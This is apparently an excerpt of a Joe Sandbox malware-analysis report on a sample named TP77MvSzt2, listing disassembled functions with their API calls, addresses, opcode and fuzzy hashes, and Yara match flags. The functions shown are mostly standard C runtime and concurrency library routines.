                                                                                  • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                  • String ID:
                                                                                  • API String ID: 64082781-0
                                                                                  • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                  • Instruction ID: 9439a16b31e8b5ac773a35d3647d61abd852967440a9b4d4d7da6e4dcddd691f
                                                                                  • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                  • Instruction Fuzzy Hash: 9B619A71A00318AFDB18CFA8E8D166DB7B2FF84316F248A2DD546DB642D771B940CB45
                                                                                  Function 00431E06 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00431E1A
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 00431E26
                                                                                  • _free.LIBCMT ref: 00431E31
                                                                                  • _free.LIBCMT ref: 00431E3C
                                                                                  • _free.LIBCMT ref: 00431E47
                                                                                  • _free.LIBCMT ref: 00431E52
                                                                                  • _free.LIBCMT ref: 00431E5D
                                                                                  • _free.LIBCMT ref: 00431E68
                                                                                  • _free.LIBCMT ref: 00431E73
                                                                                  • _free.LIBCMT ref: 00431E81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                  • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                  • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                                                  Function 0486206D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 04862081
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 0486208D
                                                                                  • _free.LIBCMT ref: 04862098
                                                                                  • _free.LIBCMT ref: 048620A3
                                                                                  • _free.LIBCMT ref: 048620AE
                                                                                  • _free.LIBCMT ref: 048620B9
                                                                                  • _free.LIBCMT ref: 048620C4
                                                                                  • _free.LIBCMT ref: 048620CF
                                                                                  • _free.LIBCMT ref: 048620DA
                                                                                  • _free.LIBCMT ref: 048620E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                  • Instruction ID: 9a3217459f1d2d0a2e5fe5734f02ec91f7c425252d1a5e57e892dd4e7685436b
                                                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                  • Instruction Fuzzy Hash: C811B9B5500148BFDB81EF5CC852CD93BA6EF04394B1146A9FD0A8F221D671EE60EB81
                                                                                  Function 0042E1D2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe
                                                                                  • String ID: f(@$f(@
                                                                                  • API String ID: 4189289331-2391611762
                                                                                  • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                  • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                                                  • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                  • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                                                  Function 004286F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: 11@$@fB$csm
                                                                                  • API String ID: 1170836740-1464837749
                                                                                  • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                  • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                                                  • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                  • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                                                  Function 04854AD4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 04854AED
                                                                                    • Part of subcall function 04854DBC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,04854820), ref: 04854DCC
                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 04854B02
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 04854B11
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04854B1F
                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 04854B95
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 04854BD5
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04854BE3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                  • String ID: 11@
                                                                                  • API String ID: 3151764488-1785270423
                                                                                  • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                  • Instruction ID: be59acdd074efd8f4beda5c8a6886d17a8a269501d1924f548586e9857cc2da0
                                                                                  • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                  • Instruction Fuzzy Hash: 8331F435A00214ABCF05EFA8C880B6D73B5FF44A14F204E69ED11E7365EBB0FA45C691
                                                                                  Function 048631B0 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                  • Instruction ID: 0a0d5c2835e4b70d8d752903f8d1583d000f5bdb626ce7eb4a4371798e67b260
                                                                                  • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                  • Instruction Fuzzy Hash: 3CC1E270E04249AFDB52DFACC844BADBBB1AF09314F044A99ED16E7392D770A941CB61
                                                                                  Function 00430EE2 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                                                  • _free.LIBCMT ref: 004311FD
                                                                                  • _free.LIBCMT ref: 00431216
                                                                                  • _free.LIBCMT ref: 00431248
                                                                                  • _free.LIBCMT ref: 00431251
                                                                                  • _free.LIBCMT ref: 0043125D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorLast$_memcmp
                                                                                  • String ID: 11@
                                                                                  • API String ID: 4275183328-1785270423
                                                                                  • Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                                                  • Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
                                                                                  • Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                                                  • Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
                                                                                  Function 04861149 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • _free.LIBCMT ref: 04861464
                                                                                  • _free.LIBCMT ref: 0486147D
                                                                                  • _free.LIBCMT ref: 048614AF
                                                                                  • _free.LIBCMT ref: 048614B8
                                                                                  • _free.LIBCMT ref: 048614C4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorLast
                                                                                  • String ID: 11@$C
                                                                                  • API String ID: 3291180501-2085848483
                                                                                  • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                  • Instruction ID: 46addebdd64163730ab5f763531d7e315cd45ac935c498f0c46a63de363367d8
                                                                                  • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                  • Instruction Fuzzy Hash: 52B12975A012199FDB64DF18C888AADB7B5FF08304F504AAAD94AE7351E771BE90CF40
                                                                                  Function 0485304B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 04853071
                                                                                    • Part of subcall function 04848AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 04848ADD
                                                                                  • SafeSQueue.LIBCONCRT ref: 0485308A
                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 0485314A
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0485316B
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04853179
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@
                                                                                  • API String ID: 3496964030-1785270423
                                                                                  • Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                                                  • Instruction ID: 202d8ffac088b729d1ea38db2d6dd306a2f92909be088c441309f229f88553af
                                                                                  • Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                                                  • Instruction Fuzzy Hash: F5310231600A159FDB25FF79C840A6ABBA0FF44754F004A69ED06CB2A1DB70F845CBC2
                                                                                  Function 0484C6E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • atomic_compare_exchange.LIBCONCRT ref: 0484C6FC
                                                                                  • atomic_compare_exchange.LIBCONCRT ref: 0484C720
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 0484C731
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 0484C73F
                                                                                    • Part of subcall function 04831370: __Mtx_unlock.LIBCPMT ref: 04831377
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 0484C74F
                                                                                    • Part of subcall function 0484C40F: __Cnd_broadcast.LIBCPMT ref: 0484C416
                                                                                  • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0484C75D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                  • String ID: 11@
                                                                                  • API String ID: 4258476935-1785270423
                                                                                  • Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                                                  • Instruction ID: 0d582ab0785107990eb90bc7a4ac78f7389aaad53b47a0dc50a0052de3344050
                                                                                  • Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                                                  • Instruction Fuzzy Hash: AB01D475901609A7EB10BB688D44BADB35CAF41318F140A11E900D7680EBF8FB0586D3
                                                                                  Function 0040C63D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw
                                                                                  • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                  • API String ID: 2005118841-316725708
                                                                                  • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                  • Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
                                                                                  • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                  • Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
                                                                                  Function 00432154 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                                                  • __alloca_probe_16.LIBCMT ref: 004321E6
                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                                                  • __alloca_probe_16.LIBCMT ref: 004322CB
                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                                                  • __freea.LIBCMT ref: 0043233B
                                                                                    • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                  • __freea.LIBCMT ref: 00432344
                                                                                  • __freea.LIBCMT ref: 00432369
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3864826663-0
                                                                                  • Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                                                  • Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
                                                                                  • Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                                                  • Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
                                                                                  Function 00439ECE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                  • Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
                                                                                  • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                  • Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
                                                                                  Function 0486A135 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                  • Instruction ID: 3b6a38ac24665091ca69384c842925cc8dbb8fb3b2d0a0aa9165096d291e0ffd
                                                                                  • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                  • Instruction Fuzzy Hash: 96610371A00205AFDBA4CF6CC841B9ABBF5EB06710F104AAAED46FB344E771B9419B51
                                                                                  Function 004338A3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                                                  • __fassign.LIBCMT ref: 00433960
                                                                                  • __fassign.LIBCMT ref: 0043397B
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                                                  • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                                                  • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1324828854-0
                                                                                  • Opcode ID: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                                                  • Instruction ID: 3302cc5d055cfa7cb2d102f804d659735755d65fc8cb0b0a8ea62d8a9f37e22e
                                                                                  • Opcode Fuzzy Hash: 104bec089efa8ddbbf106d3ba7b26555e8bb7f605cb6606e0c3875e27b37aebe
                                                                                  • Instruction Fuzzy Hash: 1E51B3B09002499FCB10DFA8D845BEEBBF4EF09701F14412BE556E7391E7349A51CB69
                                                                                  Function 04863B0A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(?,0485C4C4,E0830C40,?,?,?,?,?,?,0486427F,0483E061,0485C4C4,?,0485C4C4,0485C4C4,0483E061), ref: 04863B4C
                                                                                  • __fassign.LIBCMT ref: 04863BC7
                                                                                  • __fassign.LIBCMT ref: 04863BE2
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,0485C4C4,00000001,?,00000005,00000000,00000000), ref: 04863C08
                                                                                  • WriteFile.KERNEL32(?,?,00000000,0486427F,00000000,?,?,?,?,?,?,?,?,?,0486427F,0483E061), ref: 04863C27
                                                                                  • WriteFile.KERNEL32(?,0483E061,00000001,0486427F,00000000,?,?,?,?,?,?,?,?,?,0486427F,0483E061), ref: 04863C60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1324828854-0
                                                                                  • Opcode ID: c9ec468ed5257d0217e44f77c4afa4e16cabb00b598963834898839e2c0f3bac
                                                                                  • Instruction ID: b220f43f5cffa7da8901d7bf7f91a155a0764be0dcf7043315f3de0bb2eb13ce
                                                                                  • Opcode Fuzzy Hash: c9ec468ed5257d0217e44f77c4afa4e16cabb00b598963834898839e2c0f3bac
                                                                                  • Instruction Fuzzy Hash: CC51E975E00209AFDB10CFA8DC84AEEBBF8EF49700F14461AE956E7291E730A551CB61
                                                                                  Function 0484B14D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _SpinWait.LIBCONCRT ref: 0484B172
                                                                                    • Part of subcall function 048411A8: _SpinWait.LIBCONCRT ref: 048411C0
                                                                                  • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0484B186
                                                                                  • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0484B1B8
                                                                                  • List.LIBCMT ref: 0484B23B
                                                                                  • List.LIBCMT ref: 0484B24A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                  • String ID: 6+A
                                                                                  • API String ID: 3281396844-2819411039
                                                                                  • Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                                                  • Instruction ID: ce8b2d0dbac40ef19e738c3b1c71b3f30159478b734645e2ed0fe3b2b380681d
                                                                                  • Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                                                  • Instruction Fuzzy Hash: 75317C31E0576DDFDB14EFA8D5906DDBBB1BF85308F040A6AC801A7650DBB1B914CB92
                                                                                  Function 0043F961 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                  • Instruction ID: 44ae7d58254669835104620532439e4651bcdc670411f054606b0734315a2d03
                                                                                  • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                  • Instruction Fuzzy Hash: B3112772A00215BFCB212FB3AC05E6B7A5CEF8A725F10063BF815D7240DA38890486A9
                                                                                  Function 0486FBC8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
